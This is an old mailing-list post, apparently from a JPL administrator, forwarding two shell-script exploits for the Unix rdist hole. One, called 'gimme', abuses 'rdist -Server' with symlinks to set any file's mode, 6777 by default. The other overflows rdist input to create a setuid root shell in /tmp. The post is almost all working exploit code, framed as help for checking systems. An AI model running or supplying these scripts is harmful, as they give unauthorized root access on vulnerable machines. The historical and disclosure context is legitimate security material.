Figured I'd post them here first. This is nothing new, but it may provide
clues to some of you on how to check for the rdist hole.

------
Dave Hayes - Institutional Network & Communications - JPL/NASA - Pasadena CA
dave@elxr.jpl.nasa.gov       dave@jato.jpl.nasa.gov       ...usc!elroy!dxh

Nasrudin went into a bank with a check to cash. "Can you identify yourself?"
asked the clerk. Nasrudin took out a mirror and peered into it. "Yes, that's
me alright."

- ------cut here------
#! /bin/sh
# GIMME - "gimme' a file"
# Demonstrate rdist's ability to give me permission to access anything.
#
# gimme <pathname> [<permission> [<directory>]]
# <pathname> is the target file.
# <permission> is the octal mode to which the file access permission
#       should be set. Note that this may not be effective unless
#       either the SUID (4000) or SGID (2000) bits are also requested.
# <directory> is the target directory for rdist to use if a hard
#       link is desired. Note that the user must have permission
#       to create this directory, it must be on the same filesystem
#       as the target file, and the target file must not be a
#       directory. This option is necessary to change the ownership
#       of the target if chown() of a symbolic link modifies the
#       link itself, and not the file it refers to.
#
# 1991.9.14 - Tsutomu Shimomura, Los Alamos National Laboratory
#       tsutomu@no-sense.LANL.GOV

dirname=gimme$$
deftemp=/tmp
defperm=6777

if [ $1x = x ]; then
    echo "Usage: $0 <pathname> [<permission> [<directory>]]" >&2
    exit 1
fi

if [ $2x != x ]; then
    perm=$2
else
    perm=$defperm
fi

if [ $3x != x ]; then
    link="ln"
    temp=$3/$dirname
    target=$1
else
    link="ln -s"
    temp=$deftemp/$dirname
    case $1 in
    /*) target=$1 ;;
    *)  target=`pwd`/$1 ;;
    esac
fi

trap "rm -fr $temp; exit 1" 1 2 15

umask 66
mkdir $temp; if [ $? != 0 ]; then
    exit 1
fi

set `whoami` $LOGNAME
user=$1
set daemon `groups`
while [ $# != 1 ]; do
    shift
done
group=$1

(
    echo "t$temp/something"
    echo "R0 $perm 1 0 $user $group "
    while [ ! -f $temp/rdist* ]; do
        sleep 1
    done
    set $temp/rdist*
    rm -f $1
    if $link $target $1 >&2; then
        echo "" | dd bs=3 conv=sync 2>/dev/null
        echo ""
        echo 0 > $temp/status
    else
        echo 1 > $temp/status
    fi
    exit
) | rdist -Server

status=`cat $temp/status`
rm -fr $temp
exit $status
- ------cut here------
#!/bin/sh
SUID=/tmp/foosh
cat <<_EOF_ > test
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
aaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaaa
Qaaaaaaaaaaaaaaaaaaaaaaa
Scp /bin/sh $SUID
Schmod 4755 $SUID
_EOF_
cat test | /usr/ucb/rdist -Server localhost
rm -rf test
if [ -f $SUID ]; then
    echo "$SUID is a setuid shell. "
fi
------- End of Forwarded Message